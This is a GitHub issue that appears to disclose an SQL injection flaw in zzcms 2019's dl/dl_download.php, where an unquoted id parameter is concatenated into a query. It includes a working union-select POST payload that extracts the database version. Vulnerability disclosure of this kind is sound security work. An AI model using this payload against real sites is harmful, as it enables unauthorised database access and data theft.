Skip to content

zzcms 2019 dl/dl_download.php SQL injection #4

Open
@cby234

Description

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)

image

If index of ',' value in id parameter is bigger than 0 sql will be

image

When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter

image

We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ',' value at the end of id parameter

0x02 payload

give below "POC" value for post data in "/dl/dl_download.php"

POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

image

image

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions